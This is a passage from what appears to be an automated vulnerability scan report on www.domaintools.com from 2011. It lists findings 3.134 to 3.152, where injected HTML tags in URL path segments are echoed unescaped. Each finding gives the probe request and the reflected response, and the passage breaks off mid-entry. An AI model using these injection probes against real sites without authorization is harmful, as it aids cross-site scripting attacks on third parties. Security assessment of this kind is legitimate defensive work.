This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/for-salebd84c"><a>81381df8679/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:00 GMT
Content-Length: 12097
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=for-salebd84c"><a>81381df8679">
...[SNIP]...

3.134. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/sales-history/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c670"><a>f692913b6e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/sales-history3c670"><a>f692913b6e6/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:58 GMT
Content-Length: 12137
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=sales-history3c670"><a>f692913b6e6">
...[SNIP]...

3.135. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/sales-history/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56a15<a>766b9c39e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/56a15<a>766b9c39e1b/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:08 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>766b9c39e1b">Whois record for "56a15<a>766b9c39e1b"</a>
...[SNIP]...

3.136. http://www.domaintools.com/go/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /go/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afb0"><a>821b91ad92e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go4afb0"><a>821b91ad92e/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:01 GMT
Content-Length: 12045
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=go4afb0"><a>821b91ad92e">
...[SNIP]...

3.137. http://www.domaintools.com/go/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /go/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0524<a>057f2ade439 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gob0524<a>057f2ade439/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:14 GMT
Content-Length: 12024
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>057f2ade439">Whois record for "gob0524<a>057f2ade439"</a>
...[SNIP]...

3.138. http://www.domaintools.com/join/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7670"><a>e7f72eae04f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joinf7670"><a>e7f72eae04f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:25 GMT
Content-Length: 12061
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=joinf7670"><a>e7f72eae04f">
...[SNIP]...

3.139. http://www.domaintools.com/join/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3dc77<a>dac8a1db3f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /join3dc77<a>dac8a1db3f3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:37 GMT
Content-Length: 12040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>dac8a1db3f3">Whois record for "join3dc77<a>dac8a1db3f3"</a>
...[SNIP]...

3.140. http://www.domaintools.com/learn/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9be2f<a>76cd374324d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn9be2f<a>76cd374324d/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:05 GMT
Content-Length: 12048
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>76cd374324d">Whois record for "learn9be2f<a>76cd374324d"</a>
...[SNIP]...

3.141. http://www.domaintools.com/learn/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da0e5"><a>3ff88430a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learnda0e5"><a>3ff88430a0/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:51 GMT
Content-Length: 12061
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=learnda0e5"><a>3ff88430a0">
...[SNIP]...

3.142. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/domain-valuation-how-to-value-a-domain-name-421/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da915<a>1e98503d392 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/da915<a>1e98503d392/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:33 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>1e98503d392">Whois record for "da915<a>1e98503d392"</a>
...[SNIP]...

3.143. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/domain-valuation-how-to-value-a-domain-name-421/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b824e"><a>c91c917f399 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/domain-valuation-how-to-value-a-domain-name-421b824e"><a>c91c917f399/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:17 GMT
Content-Length: 12314
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-valuation-how-to-value-a-domain-name-421b824e"><a>c91c917f399">
...[SNIP]...

3.144. http://www.domaintools.com/learn/help/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/help/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d137"><a>7761a428b92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/help7d137"><a>7761a428b92/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:27 GMT
Content-Length: 12069
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=help7d137"><a>7761a428b92">
...[SNIP]...

3.145. http://www.domaintools.com/learn/help/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/help/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54f59<a>9382288a0d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/help54f59<a>9382288a0d7/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:42 GMT
Content-Length: 12048
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>9382288a0d7">Whois record for "help54f59<a>9382288a0d7"</a>
...[SNIP]...

3.146. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1771<a>e9278b394c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/b1771<a>e9278b394c3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:43 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>e9278b394c3">Whois record for "b1771<a>e9278b394c3"</a>
...[SNIP]...

3.147. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee5d"><a>050e6ab67a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-4223ee5d"><a>050e6ab67a6/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:30 GMT
Content-Length: 12394
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=how-do-i-buy-a--domain-name-currently-owned-by-someone-else-4223ee5d"><a>050e6ab67a6">
...[SNIP]...

3.148. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/what-is-whois-information-and-why-is-it-valuable-419/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f44aa<a>5111866423e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/f44aa<a>5111866423e/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:48 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>5111866423e">Whois record for "f44aa<a>5111866423e"</a>
...[SNIP]...

3.149. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/what-is-whois-information-and-why-is-it-valuable-419/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6f18"><a>ce2b449055a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/what-is-whois-information-and-why-is-it-valuable-419a6f18"><a>ce2b449055a/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:33 GMT
Content-Length: 12339
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=what-is-whois-information-and-why-is-it-valuable-419a6f18"><a>ce2b449055a">
...[SNIP]...

3.150. http://www.domaintools.com/monitor/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef6de<a>d3496a250c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitoref6de<a>d3496a250c3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:36 GMT
Content-Length: 12064
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>d3496a250c3">Whois record for "monitoref6de<a>d3496a250c3"</a>
...[SNIP]...

3.151. http://www.domaintools.com/monitor/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be728"><a>e7eacb76eb4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitorbe728"><a>e7eacb76eb4/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:22 GMT
Content-Length: 12085
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=monitorbe728"><a>e7eacb76eb4">
...[SNIP]...

3.152. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/domain-monitor/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4614d"><a>113abf8024c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitor/domain-monitor4614d"><a>113abf8024c/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:27 GMT
Content-Length: 12153
Connection: close

